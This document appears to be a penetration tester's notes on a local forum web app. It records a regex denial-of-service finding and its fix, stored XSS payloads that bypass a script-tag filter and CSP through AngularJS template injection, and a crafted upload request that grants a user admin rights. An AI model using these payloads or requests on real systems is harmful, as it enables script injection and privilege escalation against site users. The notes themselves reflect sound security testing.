REGEX Denial Of Service:

passports.js uses regex /\d+/ at line 92 

auth.js uses regex /^[ABCDE\d]+$/ at line 33


forum.js uses RegExp



Running in console causes hang:

/(a+)+$/.test("aaaaaaaaaaaaaaaaaaaaaaaaaaaa!")

mongo DB .find method causes the attack to fail

auth.js and user.js use .match() method;

When regstering users
username : (a+)+$
pass: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa1

causes crash.

Fix vulnerability by adding fuzzyText function (From https://github.com/jon-love/forumerly/blob/master/routes/forum.js line 104) in auth.js and user.js. The function escapes all RegEx special characters.



XSS:
In post body:

body</p><script>alert("123")</script>	Removes script tags
body</p><scr<script>ipt>alert("123")</scr</script>ipt>
body</p><<script>script>alert("123")<</script>/script>
body</p><<<script>script>alert("123")<</script>/script>
body</p><<<scriptscript>alert("123")<</script>/script>

Forum.js line 221-224 uses validation of html tags

body</p><<scriptscript>alert("123")</script> Small success, but does not run javascript alert.


</p><<scriptscript src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js"></script>
<div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1);//');}} </div> Failed

</p><<scriptscript src="https://cdnjs.cloudflare.com/angular.min.js"></script> <div ng-app ng-csp>{{$eval.constructor('alert(1)')()}}</div>


</p><<scriptscript src="https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1"></script>

</p><<scriptscript src="https://ajax.googleapis.com/ajax/libs/angularjs/1.6.0/angular.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/openerp/8.0.0/openerp.min.js?callback=alert(1)"></script>

</p><<scriptscript src="https://ajax.googleapis.com/ajax/libs/angularjs/1.8.2/angular.min.js"></script>
<div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} };alert(1)//');}} </div>


</p><<scriptscript src="https://ajax.googleapis.com/ajax/libs/angularjs/1.6.0/angular.min.js"></script>
<div ng-app>
  <div ng-constructor="x = $root.constructor.assign($root.constructor, {prototype: {charAt: [].join}}); $eval('a=1} }; alert(1)//')"></div>
</div>





</p><<scriptscript src="https://ajax.googleapis.com/ajax/libs/angularjs/1.6.0/angular.min.js"></script>
<div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert(1);//');}} </div>

</p><<scriptscript src="https://ajax.googleapis.com/ajax/libs/angularjs/1.6.0/angular.min.js"></script>
<div ng-app ng-csp>{{$eval.constructor('alert(1)')()}}</div>



</p><<scriptscript/src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.1/angular.js></script>
<iframe/ng-app/ng-csp/srcdoc="
  <<scriptscript/src=https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.8.0/angular.js>
  </script>
  <img/ng-app/ng-csp/src/ng-o{{}}n-error=$event.target.ownerDocument.defaultView.alert($event.target.ownerDocument.domain)>"
>


</p><<scriptscript src="https://cdnjs.cloudflare.com/angularjs/1.1.3/angular.min.js"> </script>
<div ng-app ng-csp id=p ng-click=$event.view.alert(1337)>



</p><iframe src="javasjavascript:cript:console.log(`You've been hacked!`)"></iframe>




RCE:
vulnerability in users.js merge().




Others?:
Found privilege escalation: send a crafted post /upload/users:

POST /upload/users HTTP/1.1
Host: localhost:3000
Content-Length: 404
Cache-Control: max-age=0
sec-ch-ua: "Not.A/Brand";v="99", "Chromium";v="136"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Accept-Language: en-GB,en;q=0.9
Origin: http://localhost:3000
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFgVP8bepPyvfE2Ci
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost:3000/
Accept-Encoding: gzip, deflate, br
Cookie: connect.sid=s%3AO-ToTSvib1hWPHw3krb3ojlxqTNJ7NAa.eq47DhGdZBjNMhlesSvkHiz4MuPxN7HM1F0aUCP52cI
Connection: keep-alive

------WebKitFormBoundaryFgVP8bepPyvfE2Ci
Content-Disposition: form-data; name="upload-users"; filename="testusers"
Content-Type: application/octet-stream

[{"_id":"69ea29eb61c92d1064643d0a","username":"test1","lcUsername":"test1","password":"12","joinDate":"2026-04-23T14:17:15.653Z","licensePlate":"AAA111","img":"/images/profile.png","admin":true}]
------WebKitFormBoundaryFgVP8bepPyvfE2Ci--



This POST adds admin privileges to the user test1.
To change a user you do not have to know the _id. It can be removed as using the wrong _id causes the login to crash. 
